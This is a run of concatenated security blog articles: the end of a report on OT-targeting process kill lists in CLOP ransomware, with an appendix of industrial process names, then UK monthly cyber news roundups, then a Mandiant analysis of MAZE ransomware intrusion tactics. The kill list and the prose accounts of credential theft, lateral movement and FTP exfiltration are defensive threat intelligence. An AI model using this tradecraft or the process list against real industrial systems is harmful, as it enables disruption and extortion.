        While it is likely the physical processes this software controls would continue to operate even if the software processes were terminated unexpectedly, stopping the software processes included in the CLOP sample’s kill list could result in the loss of view/control over those physical processes due to the inability of operators to interact with the equipment. This can be caused not only by the ransomware’s disruption of intermediary systems, but also by the loss of access to relevant files on HMIs/EWS required for the operation of process control and monitoring software–for example configurations or project files. This could prolong the mean time to recovery (MTTR) of impacted environments without offline backups. In the CLOP sample list, we also identified specialized processes for software application design and testing that may also become corrupted at the time of encryption.

        Process Kill Lists Are Just An Observable Indicating Broader Financially Motivated Interest In OT

        Financially motivated threat actors leverage a large variety of tactics and techniques to obtain data that they can later use to generate profits. While financial actors have historically posed little to no threat to OT systems, the recent uptick in ransomware and extortion incidents highlights that industrial operations are increasingly at risk. Although we have not observed any financially motivated actors explicitly targeting OT systems, our research into process kill lists deployed with or alongside ransomware samples shows that at least two sophisticated financial actors have expanded their access into OT networks during their regular intrusions.

        This increasing exposure of OT to financially motivated threat activity is no surprise, given that TTPs used by cybercriminals increasingly resemble those employed by sophisticated actors. We have consistently conveyed this message since at least 2018, when we publicly discussed the commodity and custom IT tools leveraged by the TRITON attacker while traversing through its targets’ networks (Figure 3). The likelihood of financially motivated actors impacting OT while seeking to monetize intrusions will continue to rise for the following reasons:


        Figure 3: TTPs seen across both IT and OT incidents

        • Financially-motivated threat actors moving to a post-compromise ransomware model will continue to evolve and find ways to reach the most critical systems of organizations as part of their mission of monetization. As these actors are mainly driven by profits, they are not likely to differentiate between IT and OT assets.
        • OT organizations will continue to struggle to evolve at the same pace as cyber criminals. As a result, small weaknesses such as misconfigurations, exposed vulnerabilities or improper segmentation will be enough for financial actors to gain access to networks in their attempts to profit from intrusions.
        • As the market for OT solutions continues to incorporate IT services and features into broadly adopted products, we expect the convergence of technologies to result in a broader attack surface for financial threat actors to target.
        • The TTPs employed by both financial and sophisticated nation-state actors often rely on intermediary systems as stepping stones through intrusions. As a result, the skills of both groups hold similar potential of reaching OT systems even when financial groups may only do so coincidentally or as part of their monetization strategy.

        Outlook

        As OT networks continue to become more accessible to threat actors of all motivations, security threats that have historically impacted primarily IT are becoming more commonplace. This normalization of OT as just another network from the threat actor perspective is problematic for defenders for many of the reasons discussed above. This recent threat activity should be taken as a wake-up call for two main reasons: the various security challenges commonly faced by organizations to protect OT networks, and the significant consequences that may arise from security compromises even when they are not explicitly designed to target production systems. Asset owners need to look at OT security with the mindset that it is not if you will have a breach, but when. This shift in thinking will allow defenders to better prepare to respond when an incident does happen, and can help reduce the impact of an incident by orders of magnitude.   

        Appendix: Selection Of OT Processes From CLOP Kill List

        Process Name

        Vendor

        ACTLICENSESERVER.EXE

        Atlas Copco

        TCATSYSSRV.EXE

        Beckhoff

        TCEVENTLOGGER.EXE

        Beckhoff

        TCR.EXE

        Beckhoff

        ALARMMANAGER.EXE

        GE

        S2.EXE

        Honeywell

        BR.ADI.DISPLAY.BRIGHTNESS.EXE

        B&R

        BR.ADI.SERVICE.EXE

        B&R

        BR.ADI.UPS.MANAGER.EXE

        B&R

        BR.ADI.UPS.SERVICE.EXE

        B&R

        BR.AS.UPGRADESERVICE.EXE

        B&R

        BRAUTHORIZATIONSVC.EXE

        B&R

        BRTOUCHSVC.EXE

        B&R

        OPCROUTER4SERVICE.EXE

        Inray Industriesoftware

        OPCROUTERCONFIG.EXE

        Inray Industriesoftware

        SERVER_EVENTLOG.EXE

        Kepware

        SERVER_RUNTIME.EXE

        Kepware

        NICELABELAUTOMATIONSERVICE2017.EXE

        NiceLabel

        NICELABELPROXY.EXE

        NiceLabel

        NICELABELPROXYSERVICE2017.EXE

        NiceLabel

        APPLICATIONWEBSERVER.EXE

        National Instruments

        CWDSS.EXE

        National Instruments

        NIAUTH_DAEMON.EXE

        National Instruments

        NIDEVMON.EXE

        National Instruments

        NIDISCSVC.EXE

        National Instruments

        NIDMSRV.EXE

        National Instruments

        NIERSERVER.EXE

        National Instruments

        NILXIDISCOVERY.EXE

        National Instruments

        NIMDNSRESPONDER.EXE

        National Instruments

        NIMXS.EXE

        National Instruments

        NIPXICMS.EXE

        National Instruments

        NIROCO.EXE

        National Instruments

        NISDS.EXE

        National Instruments

        NISVCLOC.EXE

        National Instruments

        NIWEBSERVICECONTAINER.EXE

        National Instruments

        SYSTEMWEBSERVER.EXE

        National Instruments

        OPC.UA.DISCOVERYSERVER.EXE

        OPC

        OPCUALDS.EXE

        OPC

        ANAWIN.EXE

        AUTEM

        ASM.EXE

        Possibly Siemens

        PARAMETRIC.EXE

        PTC

        QDAS_O-QIS.EXE

        Q-Das

        QDAS_PROCELLA.EXE

        Q-Das

        QDAS_QS-STAT.EXE

        Q-Das

        QDASIDI_SRV.EXE

        Q-Das

        SPCPROCESSLINK.EXE

        Q-Das

        TAGSRV.EXE

        Rockwell Automation or National Instruments

        _SIMPCMON.EXE

        Siemens

        ALMPANELPLUGIN.EXE

        Siemens

        ALMSRV64X.EXE

        Siemens

        ALMSRVBUBBLE64X.EXE

        Siemens

        CC.TUNNELSERVICEHOST.EXE

        Siemens

        CCAEPROVIDER.EXE

        Siemens

        CCAGENT.EXE

        Siemens

        CCALGRTSERVER.EXE

        Siemens

        CCARCHIVEMANAGER.EXE

        Siemens

        CCCAPHSERVER.EXE

        Siemens

        CCCSIGRTSERVER.EXE

        Siemens

        CCDBUTILS.EXE

        Siemens

        CCDELTALOADER.EXE

        Siemens

        CCDMRUNTIMEPERSISTENCE.EXE

        Siemens

        CCECLIENT_X64.EXE

        Siemens

        CCECLIENT.EXE

        Siemens

        CCESERVER_X64.EXE

        Siemens

        CCESERVER.EXE

        Siemens

        CCKEYBOARDHOOK.EXE

        Siemens

        CCLICENSESERVICE.EXE

        Siemens

        CCNSINFO2PROVIDER.EXE

        Siemens

        CCPACKAGEMGR.EXE

        Siemens

        CCPERFMON.EXE

        Siemens

        CCPROFILESERVER.EXE

        Siemens

        CCPROJECTMGR.EXE

        Siemens

        CCPTMRTSERVER.EXE

        Siemens

        CCREDUNDANCYAGENT.EXE

        Siemens

        CCREMOTESERVICE.EXE

        Siemens

        CCRT2XML.EXE

        Siemens

        CCRTSLOADER_X64.EXE

        Siemens

        CCSSMRTSERVER.EXE

        Siemens

        CCSYSTEMDIAGNOSTICSHOST.EXE

        Siemens

        CCTEXTSERVER.EXE

        Siemens

        CCTLGSERVER.EXE

        Siemens

        CCTMTIMESYNC.EXE

        Siemens

        CCTMTIMESYNCSERVER.EXE

        Siemens

        CCUCSURROGATE.EXE

        Siemens

        CCWATCHOPC.EXE

        Siemens

        CCWRITEARCHIVESERVER.EXE

        Siemens

        DA2XML.EXE

        Siemens

        GSCRT.EXE

        Siemens

        HMIES.EXE

        Siemens

        HMIRTM.EXE

        Siemens

        HMISMARTSTART.EXE

        Siemens

        HMRT.EXE

        Siemens

        IPCSECCOM.EXE

        Siemens

        OPCUASERVERWINCC.EXE

        Siemens

        PASSDBRT.EXE

        Siemens

        PDLRT.EXE

        Siemens

        PMEXP.EXE

        Siemens

        PNIOMGR.EXE

        Siemens

        REDUNDANCYCONTROL.EXE

        Siemens

        REDUNDANCYSTATE.EXE

        Siemens

        S7ACMGRX.EXE

        Siemens

        S7AHHLPX.EXE

        Siemens

        S7ASYSVX.EXE

        Siemens

        S7EPASRV64X.EXE

        Siemens

        S7HSPSVX.EXE

        Siemens

        S7KAFAPX.EXE

        Siemens

        S7O.TUNNELSERVICEHOST.EXE

        Siemens

        S7OIEHSX64.EXE

        Siemens

        S7OPNDISCOVERYX64.EXE

        Siemens

        S7SYMAPX.EXE

        Siemens

        S7TGTOPX.EXE

        Siemens

        S7TRACESERVICE64X.EXE

        Siemens

        S7UBTOOX.EXE

        Siemens

        S7UBTSTX.EXE

        Siemens

        S7WNRMSX.EXE

        Siemens

        S7WNSMGX.EXE

        Siemens

        S7WNSMSX.EXE

        Siemens

        S7XUDIAX.EXE

        Siemens

        S7XUTAPX.EXE

        Siemens

        SCORECFG.EXE

        Siemens

        SCOREDP.EXE

        Siemens

        SCOREPNIO.EXE

        Siemens

        SCORES7.EXE

        Siemens

        SCORESR.EXE

        Siemens

        SCSDISTSERVICEX.EXE

        Siemens

        SCSFSX.EXE

        Siemens

        SCSMX.EXE

        Siemens

        SDIAGRT.EXE

        Siemens

        SIEMENS.INFORMATIONSERVER.DISCOVERSERVICEINSTALLER.EXE

        Siemens

        SIEMENS.INFORMATIONSERVER.ISREADY.PLUGINSERVICE.EXE

        Siemens

        SIEMENS.INFORMATIONSERVER.SCHEDULER.EXE

        Siemens

        SIM9SYNC.EXE

        Siemens

        SIMNETPNPMAN.EXE

        Siemens

        SMARTSERVER.EXE

        Siemens

        SSERVCFG.EXE

        Siemens

        TOUCHINPUTPC.EXE

        Siemens

        TRACECONCEPTX.EXE

        Siemens

        TRACESERVER.EXE

        Siemens

        UM.RIS.EXE

        Siemens

        UM.SSO.EXE

        Siemens

        WEBNAVIGATORRT.EXE

        Siemens

        WINCCEXPLORER.EXE

        Siemens

        CCDMRTCHANNELHOST.EXE

        Siemens

        ANSYS.ACT.BROWSER.EXE

        Ansys

        ANSYS.EXE

        Ansys

        ANSYS192.EXE

        Ansys

        ANSYSFWW.EXE

        Ansys

        ANSYSLI_CLIENT.EXE

        Ansys

        ANSYSLI_MONITOR.EXE

        Ansys

        ANSYSLI_SERVER.EXE

        Ansys

        ANSYSLMD.EXE

        Ansys

        ANSYSWBU.EXE

        Ansys

        CONFIGSERVERI64.EXE

        Tani

        ENGINELOGGERI64.EXE

        Tani

        PLCENGINEI64.EXE

        Tani

        Cyber Security Roundup for July 2020

        A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, June 2020.

        Australian Prime Minister Scott Morrison announced a sophisticated nation-state actor is causing increasing havoc by attacking the country’s government, corporate institutions, and his country's critical infrastructure operators. He said, “We know it is a sophisticated state-based cyber actor because of the scale and nature of the targeting and the tradecraft used". While Morrison didn't actually name the specific country responsible in his statement, Reuters said its sources confirmed China was the culprit.  Political t
        ensions have ramped up between Australia and China in recent months after Australia called for an investigation into China’s handling of the COVID-19 pandemic. China then reacted by placing tariffs on Australian exports and banning shipments of beef from Australia.

        Why am I leading a UK cybersecurity blog with an Australian cyberattacks story? Well, it is because the UK might well be next in the cross-hairs of China's sophisticated cyber army, after the UK Governance stance on using Huawei in 5G infrastructure significantly soured last month. And also due to the increasing political pressure applied by the UK government on the Chinese government following their introduction of a controversial new security law in Hong Kong.

        Increased UK Huawei Tensions in June 2020
        While the Australian PM righty suggested their nation-state threat actor was sophisticated, the cyberattacks they described aren't so sophisticated. Their attackers engaged in spear-phishing campaigns designed to trick email recipients into clicking a link leading to a malicious files or credential harvesting page, opening malicious attachments or granting Office 365 OAuth tokens to the actors.  This is the same MO of cyber attacks orchestrated by the cybercriminals fraternity on a daily basis. The Australian government statement advises organisations to patch their internet-facing devices, including web and email servers and to use multifactor authentication. All good advise, in fact, all essential good practice for all organisations to adopt no matter their threat actor landscape.

        Away from the international cyber warfare scene, a coalition led by security companies is urging the UK government to revamp the much-dated Computer Misuse Act. The UK's 'anti-hacking' law is 30 years old, so written well before the internet took root in our digital society, so is not really suitable for prosecuting for modern cybercriminals, they tend to be prosecuted under financial crime and fraud laws. The coalition is calling for a change in the law includes the NCC Group, F-Secure, techUK, McAfee and Trend Micro. They argue section 1 of the Act prohibits the unauthorised access to any programme or data held in any computer and has not kept pace with advances in technology. In their letter to PM they said "With the advent of modern threat intelligence research, defensive cyber activities often involve the scanning and interrogation of compromised victims and criminals systems to lessen the impact of attacks and prevent future incidents. In these cases, criminals are obviously very unlikely to explicitly authorise such access."

        Since launching a 'Suspicious Email Reporting Service' in April 2020, the UK National Cyber Security Centre (NCSC) announced it has now received one million reports, receiving around 16,500 emails a day. NCSC Chief Executive Officer Ciaran Martin called the number of reports a “milestone” and “a testament to the vigilance of the British public". I think the email reporting service is another fantastic free service provided by NCSC (i.e. UK Gov) to UK citizens, so one thing the UK government is definitely getting right in the cybersecurity space at the moment.

        Zoom announced it will extend 'optional' end-to-end encryption (E2EE) to free users. It is not certain when exactly Zoom's free E2EE will commence or whether it will be defaulted as on, given the Zoom CEO said, “We plan to begin early beta of the E2EE feature in July 2020.” Still good to see the much security criticised Zoom is continuing to bolstering its security, and also by appointing a seasoned Chief Information Security Officer from Salesforce.

        Some men just want to watch the world burn...
        With the recent uptick in ransomware, phishing, unsecured cloud buckets and massive data breaches dominating the media headlines over the past couple of years, you could be forgiven for forgetting about the threat posed by Distributed-Denial-of-Service (DDoS) attacks. So then, a timely reminder that some threat actors have vast botnets as their disposal for orchestrating huge DDoS attacks after Amazon reported thwarting the biggest ever DDoS attack, and a European bank suffered the biggest ever PPS DDoS attack. The motives of these colossal DDoS attacks are unclear, I guess some men just want to watch the world burn.
        Quote from Batman butler Alfred (Michael Caine), The Dark Knight
        BLOG
        NEWS
        VULNERABILITIES AND SECURITY UPDATES
        AWARENESS, EDUCATION AND THREAT INTELLIGENCE

          Cyber Security Roundup for June 2020

          A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, May 2020.

          EasyJet's disclosure of a "highly sophisticated cyber-attack", which occurred in January 2020, impacting 9 million of their customers was the biggest cybersecurity story of May 2020 in the UK. Although no details about this 'cyber-attack' were disclosed, other than 2,208 customers had their credit card details accessed.  


          Using terms like "highly sophisticated" without providing any actual details of the cyberattack makes one think back to when TalkTalk CEO Dido Harding described a cyber-attack as "significant and sustained cyber-attack" in 2015. In TalkTalk's case, that cyber attack turned out to be a bunch of teenage kids taking advantage of a then 10-year-old SQL injection vulnerability.  City A.M. described Dido's responses as "naive", noting when asked if the affected customer data was encrypted or not, she replied: "The awful truth is that I don’t know". Today Dido is responsible for the UK governments Track, Test and Trace application, which no doubt will ring privacy alarms bells with some. 

          Back to the EasyJet breach, all we know is the ICO and the NCSC are supporting UK budget airline, EasyJet said "We take issues of security extremely seriously and continue to invest to further enhance our security environment. There is no evidence that any personal information of any nature has been misused, however, on the recommendation of the ICO, we are communicating with the approximately nine million customers whose travel details were accessed to advise them of protective steps to minimise any risk of potential phishing. We are advising customers to be cautious of any communications purporting to come from EasyJet or EasyJet Holidays." 

          It will be interesting to see the DPA enforcement line Information Commission's Office (ICO) adopts with EasyJet, especially considering the current COVID-19 impact on the UK aviation industry.  Some security commentators have called ICO a "Toothless Tiger" in regards to their supportive response, an ICO label I've not heard since long before the GDPR came into force. But the GDPR still has a sting its tail beyond ICO enforcement action in the UK, in that individuals impacted by personal data breaches can undertake a class-action lawsuit. So then, it can be no real surprise to law firm PGMBM announce it has issued a class-action claim in the High Court of London, with a potential liability of an eye-watering £18 billion!. If successful, each customer impacted by the breach could receive a payout of £2,000.

          The 2020 Verizon Data Breach Investigations Report (DBIR) was released, the most valuable annual report in the cybersecurity industry in my humble opinion. The 2020 DBIR used data compiled before COVID-19 pandemic.  The report analyses 32,002 security incidents and 3,950 confirmed breaches from 81 global contributors from 81 countries.
          • 86% of data breaches for financial gain - up from 71% in 2019 
          • 43% web application (cloud-based) - these attacks have doubled, reflecting the growth in the use of cloud-based services.
          • 67% of data breaches resulted from credential theft, human error or social attacks. 
          • Clearly identified cyber-breach pathways enable a “Defender Advantage” in the fight against cyber-crime 
          • On-going patching successful - fewer than 1 in 20 breaches exploit vulnerabilities
          The vast majority of breaches continue to be caused by external actors.
          • 70% with organised crime accounting for 55% of these. 
          • Credential theft and social attacks such as phishing and business email compromises cause the majority of breaches (over 67%), specifically:
            • 37% of credential theft breaches used stolen or weak credentials,
            • 25% involved phishing
            • Human error accounted for 22%
          The 2020 DBIR highlighted a two-fold increase in web application breaches, to 43%, and stolen credentials were used in over 80% of these cases. Ransomware had a slight increase, found in 27% of malware incidents compared to 24% in the 2019 DBIR with 18% of organisations reported blocking at least one piece of ransomware last year.

          REvil (aka Sodinokibi) hackers are said to have stolen celebrity data from a law firm 'Grubman Shire Meiselas & Sacks'. With 756 gigabytes of personal data, emails, and contract details were taken, including Lady Gaga, Madonna, Elton John, Barbara Streisand, Bruce Springsteen and Mariah Carey to name a few. 

          Pitney Bowes was hit with ransomware for the second time in 7 monthsPitney Bowes said attackers breached company systems and accessed “a limited set of corporate file shares” that “contained information used by our business teams and functional groups to conduct business-related activities.” News reports state the Maze ransomware group is behind the attack, threatening to post confidential if Pitney Bowes does not pay up.

          Amazon's UK website was defaced with racist abuse,  which appeared on multiple listings on its UK website. Amazon has not disclosed how long the racist language remained on the site, but it sparked outrage on Twitter, Amazon said: "We investigated, removed the images in question and took action against the bad actor".

          LogMeOnce, a password identity management suite provider, has published a detailed interview with myself titled 'Passwords are and have always been an Achilles Heel in CyberSecurity'. In the Q&A I talk about Passwords Security (obviously), Threat Actors, IoT Security, Multi-Factor Authentication (MFA), Anti-Virus, Biometrics, AI, Privacy, and a bit on how I got into a career in Cybersecurity.

          BLOG
          NEWS
          VULNERABILITIES AND SECURITY UPDATES
          AWARENESS, EDUCATION AND THREAT INTELLIGENCE

            Passwords are and have always been an Achilles Heel in CyberSecurity

            LogMeOnce, a password identity management suite provider, has published a detailed interview with myself titled 'Passwords are and have always been an Achilles Heel in CyberSecurity'. In the Q&A I talk about Passwords Security (obviously), Threat Actors, IoT Security, Multi-Factor Authentication (MFA), Anti-Virus, Biometrics, AI, Privacy, and a bit on how I got into a career in Cybersecurity.

            Quotes
            “I’m afraid people will remain the weakest link in security, and the vast majority of cybercriminals go after this lowest hanging fruit. It’s the least effort for the most reward.”

            "There is no silver bullet with password security, but MFA comes close, it significantly reduces the risk of account compromise"

            "The built-in biometric authentication capabilities of smartphones are a significant advancement for security"

            "Cybercriminals go after this lowest hanging fruit, the least effort for the most reward."

            "As technology becomes more secure and more difficult to defeat, it stands to reason criminals will increasingly target people more."

            "The impact of the WannaCry ransomware outbreak on NHS IT systems is a recent example of such cyberattack which threatens lives."

            "Machine Learning can provide real benefits, especially in large Security Operations Centres (SOC), by helping analysts breakdown the steady stream of data into actionable intelligence, reducing workload and false-positive errors"

            "When I look at new technology today, I still seek to thoroughly understand how it works, naturally thinking about the weaknesses which could be exploited, and the negative impact of such exploits on the people and businesses using the technology. I developed a kind of a ‘hacker’s eye for business’"

            Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents

            Targeted ransomware incidents have brought a threat of disruptive and destructive attacks to organizations across industries and geographies. FireEye Mandiant Threat Intelligence has previously documented this threat in our investigations of trends across ransomware incidents, FIN6 activity, implications for OT networks, and other aspects of post-compromise ransomware deployment. Since November 2019, we’ve seen the MAZE ransomware being used in attacks that combine targeted ransomware use, public exposure of victim data, and an affiliate model.

            Malicious actors have been actively deploying MAZE ransomware since at least May 2019. The ransomware was initially distributed via spam emails and exploit kits before later shifting to being deployed post-compromise. Multiple actors are involved in MAZE ransomware operations, based on our observations of alleged users in underground forums and distinct tactics, techniques, and procedures across Mandiant incident response engagements. Actors behind MAZE also maintain a public-facing website where they post data stolen from victims who refuse to pay an extortion fee.

            The combination of these two damaging intrusion outcomes—dumping sensitive data and disrupting enterprise networks—with a criminal service makes MAZE a notable threat to many organizations. This blog post is based on information derived from numerous Mandiant incident response engagements and our own research into the MAZE ecosystem and operations.

            Mandiant Threat Intelligence will be available to answer questions on the MAZE ransomware threat in a May 21 webinar.

            Victimology

            We are aware of more than 100 alleged MAZE victims reported by various media outlets and on the MAZE website since November 2019. These organizations have been primarily based in North America, although victims spanned nearly every geographical region. Nearly every industry sector including manufacturing, legal, financial services, construction, healthcare, technology, retail, and government has been impacted demonstrating that indiscriminate nature of these operations (Figure 1).


            Figure 1: Geographical and industry distribution of alleged MAZE victims

            Multiple Actors Involved in MAZE Ransomware Operations Identified

            Mandiant identified multiple Russian-speaking actors who claimed to use MAZE ransomware and were seeking partners to fulfill different functional roles within their teams. Additional information on these actors is available to Mandiant Intelligence subscribers. A panel used to manage victims targeted for MAZE ransomware deployment has a section for affiliate transactions. This activity is consistent with our assessment that MAZE operates under an affiliate model and is not distributed by a single group. Under this business model, ransomware developers will partner with other actors (i.e. affiliates) who are responsible for distributing the malware. In these scenarios, when a victim pays the ransom demand, the ransomware developers receive a commission. Direct affiliates of MAZE ransomware also partner with other actors who perform specific tasks for a percentage of the ransom payment. This includes partners who provide initial access to organizations and pentesters who are responsible for reconnaissance, privilege escalation and lateral movement—each of which who appear to work on a percentage-basis. Notably, in some cases, actors may be hired on a salary basis (vs commission) to perform specific tasks such as determining the victim organization and its annual revenues. This allows for specialization within the cyber criminal ecosystem, ultimately increasing efficiency, while still allowing all parties involved to profit.


            Figure 2: MAZE ransomware panel

            MAZE Initially Distributed via Exploit Kits and Spam Campaigns

            MAZE ransomware was initially distributed directly via exploit kits and spam campaigns through late 2019. For example, in November 2019, Mandiant observed multiple email campaigns delivering Maze ransomware primarily to individuals at organizations in Germany and the United States, although a significant number of emails were also delivered to entities in Canada, Italy, and South Korea. These emails used tax, invoice, and package delivery themes with document attachments or inline links to documents which download and execute Maze ransomware.

            On November 6 and 7, a Maze campaign targeting Germany delivered macro-laden documents using the subject lines “Wichtige informationen uber Steuerruckerstattung” and “1&1 Internet AG - Ihre Rechnung 19340003422 vom 07.11.19” (Figure 3). Recipients included individuals at organizations in a wide range of industries, with the Financial Services, Healthcare, and Manufacturing sectors being targeted most frequently. These emails were sent using a number of malicious domains created with the registrant address gladkoff1991@yandex.ru.


            Figure 3: German-language lure

            On November 8, a campaign delivered Maze primarily to Financial Services and Insurance organizations located in the United states. These emails originated from a compromised or spoofed account and contained an inline link to download a Maze executable payload.

            On November 18 and 19, a Maze campaign targeted individuals operating in a range of industries in the United States and Canada with macro documents using phone bill and package delivery themes (Figure 4 and Figure 5). These emails used the subjects “Missed package delivery” and "Your AT&T wireless bill is ready to view" and were sent using a number of malicious domains with the registrant address abusereceive@hitler.rocks. Notably, this registrant address was also used to create multiple Italian-language domains towards the end of November 2019.


            Figure 4: AT&T email lure


            Figure 5: Canada Post email lure

            Shift to Post-Compromise Distribution Maximizes Impact

            Actors using MAZE have increasingly shifted to deploying the ransomware post-compromise. This methodology provides an opportunity to infect more hosts within a victim’s environment and exfiltrate data, which is leveraged to apply additional pressure on organizations to pay extortion fees. Notably, in at least some cases, the actors behind these operations charge an additional fee, in addition to the decryption key, for the non-release of stolen data.

            Although the high-level intrusion scenarios preceding the distribution of MAZE ransomware are broadly similar, there have been notable variations across intrusions that suggest attribution to distinct teams. Even within these teams, the cyber criminals appear to be task-oriented meaning that one operator is not responsible for the full lifecycle. The following sections highlight the TTPs seen in a subset of incidents and serve to illustrate the divergence that may occur due to the fact that numerous, disparate actors are involved in different phases of these operations. Notably, the time between initial compromise to encryption has also been widely varied, from weeks to many months.

            Initial Compromise

            There are few clear patterns for intrusion vector across analyzed MAZE ransomware incidents. This is consistent with our observations of multiple actors who use MAZE soliciting partners with network access. The following are a sample of observations from several Mandiant incident response engagements:

            • A user downloaded a malicious resume-themed Microsoft Word document that contained macros which launched an IcedID payload, which was ultimately used to execute an instance of BEACON.
            • An actor logged into an internet-facing system via RDP. The account used to grant initial access was a generic support account. It is unclear how the actor obtained the account's password.
            • An actor exploited a misconfiguration on an Internet-facing system. This access enabled the actor to deploy tools to pivot into the internal network.
            • An actor logged into a Citrix web portal account with a weak password. This authenticated access enabled the actor to launch a Meterpreter payload on an internal system.

            Establish Foothold & Maintain Presence

            The use of legitimate credentials and broad distribution of BEACON across victim environments appear to be consistent approaches used by actors to establish their foothold in victim networks and to maintain presence as they look to meet their ultimate objective of deploying MAZE ransomware. Despite these commonplace behaviors, we have observed an actor create their own domain account to enable latter-stage operations.

            • Across multiple incidents, threat actors deploying MAZE established a foothold in victim environments by installing BEACON payloads on many servers and workstations.
            • Web shells were deployed to an internet-facing system. The system level access granted by these web shells was used to enable initial privilege escalation and the execution of a backdoor.
            • Intrusion operators regularly obtained and maintained access to multiple domain and local system accounts with varying permissions that were used throughout their operations.
            • An actor created a new domain account and added it to the domain administrators group.

            Escalate Privileges

            Although Mandiant has observed multiple cases where MAZE intrusion operators employed Mimikatz to collect credentials to enable privilege escalation, these efforts have also been bolstered in multiple cases via use of Bloodhound, and more manual searches for files containing credentials.

            • Less than two weeks after initial access, the actor downloaded and interacted with an archive named mimi.zip, which contained files corresponding to the credential harvesting tool Mimikatz. In the following days the same mimi.zip archive was identified on two domain controllers in the impacted environment.
            • The actor attempted to find files with the word “password” within the environment. Additionally, several archive files were also created with file names suggestive of credential harvesting activity.
            • The actor attempted to identify hosts running the KeePass password safe software.
            • Across multiple incidents, the Bloodhound utility was used, presumably to assess possible methods of obtaining credentials with domain administrator privileges.
            • Actors primarily used Procdump and Mimikatz to collect credentials used to enable later stages of their intrusion. Notably, both Bloodhound and PingCastle were also used, presumably to enable attackers' efforts to understand the impacted organization's Active Directory configuration. In this case the responsible actors also attempted to exfiltrate collected credentials to multiple different cloud file storage services.

            Reconnaissance

            Mandiant has observed a broad range of approaches to network, host, data, and Active Directory reconnaissance across observed MAZE incidents. The varied tools and approaches across these incidents maybe best highlights the divergent ways in which the responsible actors interact with victim networks.

            • In some intrusions, reconnaissance activity occurred within three days of gaining initial access to the victim network. The responsible actor executed a large number of reconnaissance scripts via Cobalt Strike to collect network, host, filesystem, and domain related information.
            • Multiple built-in Windows commands were used to enable network, account, and host reconnaissance of the impacted environment, though the actors also supplied and used Advanced IP Scanner and Adfind to support this stage of their operations.
            • Preliminary network reconnaissance has been conducted using a batch script named '2.bat' which contained a series of nslookup commands. The output of this script was copied into a file named '2.txt'.
            • The actor exfiltrated reconnaissance command output data and documents related to the IT environment to an attacker-controlled FTP server via an encoded PowerShell script.
            • Over a period of several days, an actor conducted reconnaissance activity using Bloodhound, PowerSploit/PowerView (Invoke-ShareFinder), and a reconnaissance script designed to enumerate directories across internal hosts.
            • An actor employed the adfind tool and a batch script to collect information about their network, hosts, domain, and users. The output from this batch script (2adfind.bat) was saved into an archive named 'ad.7z' using an instance of the 7zip archiving utility named 7.exe.
            • An actor used the tool smbtools.exe to assess whether accounts could login to systems across the environment.
            • An actor collected directory listings from file servers across an impacted environment. Evidence of data exfiltration was observed approximately one month later, suggesting that the creation of these directory listings may have been precursor activity, providing the actors with data they may have used to identify sensitive data for future exfiltration.

            Lateral Movement

            Across the majority of MAZE ransomware incidents lateral movement was accomplished via Cobalt Strike BEACON and using previously harvested credentials. Despite this uniformity, some alternative tools and approaches were also observed.

            • Attackers relied heavily on Cobalt Strike BEACON to move laterally across the impacted environment, though they also tunneled RDP using the ngrok utility, and employed tscon to hijack legitimate rdp sessions to enable both lateral movement and privilege escalation.
            • The actor moved laterally throughout some networks leveraging compromised service and user accounts obtained from the system on which they gained their initial foothold. This allowed them to obtain immediate access to additional systems. Stolen credentials were then used to move laterally across the network via RDP and to install BEACON payloads providing the actors with access to nearly one hundred hosts.
            • An actor moved laterally using Metasploit and later deployed a Cobalt Strike payload to a system using a local administrator account.
            • At least one actor attempted to perform lateral movement using EternalBlue in early and late 2019; however, there is no evidence that these attempts were successful.

            Complete Mission

            There was evidence suggesting data exfiltration across most analyzed MAZE ransomware incidents. While malicious actors could monetize stolen data in various way (e.g. sale in an underground forum, fraud), actors employing MAZE are known to threaten the release of stolen data if victim organizations do not pay an extortion fee.

            • An actor has been observed exfiltrating data to FTP servers using a base64-encoded PowerShell script designed to upload any files with .7z file extensions to a predefined FTP server using a hard-coded username and password. This script appears to be a slight variant of a script first posted to Microsoft TechNet in 2013.
            • A different base64-encoded PowerShell command was also used to enable this functionality in a separate incident.
            • Actors deploying MAZE ransomware have also used the utility WinSCP to exfiltrate data to an attacker-controlled FTP server.
            • An actor has been observed employing a file replication utility and copying the stolen data to a cloud file hosting/sharing service.
            • Prior to deploying MAZE ransomware threat actors employed the 7zip utility to archive data from across various corporate file shares. These archives were then exfiltrated to an attacker-controlled server via FTP using the WinSCP utility.

            In addition to data theft, actors deploy MAZE ransomware to encrypt files identified on the victim network. Notably, the aforementioned MAZE panel has an option to specify the date on which ransom demands will double, likely to create a sense of urgency to their demands.

            • Five days after data was exfiltrated from a victim environment the actor copied a MAZE ransomware binary to 15 hosts within the victim environment and successfully executed it on a portion of these systems.
            • Attackers employed batch scripts and a series to txt files containing host names to distribute and execute MAZE ransomware on many servers and workstations across the victim environment.
            • An actor deployed MAZE ransomware to tens of hosts, explicitly logging into each system using a domain administrator account created earlier in the intrusion.
            • Immediately following the exfiltration of sensitive data, the actors began deployment of MAZE ransomware to hosts across the network. In some cases, thousands of hosts were ultimately encrypted. The encryption process proceeded as follows:
              • A batch script named start.bat was used to execute a series of secondary batch scripts with names such as xaa3x.bat or xab3x.bat.
              • Each of these batch scripts contained a series of commands that employed the copy command, WMIC, and PsExec to copy and execute a kill script (windows.bat) and an instance of MAZE ransomware (sss.exe) on hosts across the impacted environment
              • Notably, forensic analysis of the impacted environment revealed MAZE deployment scripts targeting ten times as many hosts as were ultimately encrypted.

            Implications

            Based on our belief that the MAZE ransomware is distributed by multiple actors, we anticipate that the TTPs used throughout incidents associated with this ransomware will continue to vary somewhat, particularly in terms of the initial intrusion vector. For more comprehensive recommendations for addressing ransomware, please refer to our Ransomware Protection and Containment Strategies blog post and the linked white paper.

            Mandiant Security Validation Actions

            Organizations can validate their security controls against more than 20 MAZE-specific actions with Mandiant Security Validation. Please see our Headline Release Content Updates – April 21, 2020 on the Mandiant Security Validation Customer Portal for more information.

            • A100-877 - Active Directory - BloodHound, CollectionMethod All
            • A150-006 - Command and Control - BEACON, Check-in
            • A101-030 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #1
            • A101-031 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #2
            • A101-032 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #3
            • A100-878 - Command and Control - MAZE Ransomware, C2 Check-in
